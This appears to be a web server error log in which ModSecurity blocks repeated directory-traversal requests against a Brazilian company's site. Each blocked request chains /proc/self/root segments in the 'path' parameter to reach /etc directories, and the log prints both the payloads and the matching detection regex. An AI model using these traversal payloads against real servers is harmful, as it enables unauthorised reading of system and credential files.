[Thu Mar 19 03:51:37.766309 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:35200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuc-QkwaGbbGflqUZB6kgAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:40.108538 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:45618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuc_AkwaGbbGflqUZB6lgAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:42.469061 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:45624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuc_gkwaGbbGflqUZB6mwAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:43.725971 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:45628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuc_9a6ubjKNq_cu4YFIQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:47.136742 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:45634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudA8df6f5d65gmYZQ5ugAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:49.463647 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:48164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudBfu8EFLIOrSqIptkJwAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:50.937415 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:48180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudBta6ubjKNq_cu4YFJwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:54.375244 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:48188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudCuoXxyEfFpUF8f_XvAAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:55.712871 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:48192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudC-yqAr6etmhZHNoqnwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:56.720109 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.244.43:38936] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abudDF_V7PWP6ixUYl6CMAAAApA"]
[Thu Mar 19 03:52:00.979473 2026] [:error] [pid 19093:tid 140411641214720] [client 74.7.241.31:48202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudEF_V7PWP6ixUYl6CNAAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:09.644882 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:58592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudGcdf6f5d65gmYZQ50gAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:10.946371 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:59276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudGta6ubjKNq_cu4YFMwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:12.258080 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:59288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudHAkwaGbbGflqUZB6rgAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:13.606693 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:59304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudHda6ubjKNq_cu4YFNgAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:14.009787 2026] [mime_magic:error] [pid 17653:tid 140411607643904] (70014)End of file found: [client 74.7.243.128:39534] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/puppet/util
[Thu Mar 19 03:52:14.951020 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:59312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudHuyqAr6etmhZHNoqowAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:16.258190 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.241.31:59326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudIAbLMZ6AikZjR9UjnwAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:19.663282 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:53140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudI9a6ubjKNq_cu4YFQAAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:22.000603 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:53144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudJfu8EFLIOrSqIptkNwAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:52:27.584960 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:34336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudKuoXxyEfFpUF8f_XygAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:52:27.585811 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.241.31:53150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudKhkFeYa1D6dYQnCzVQAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
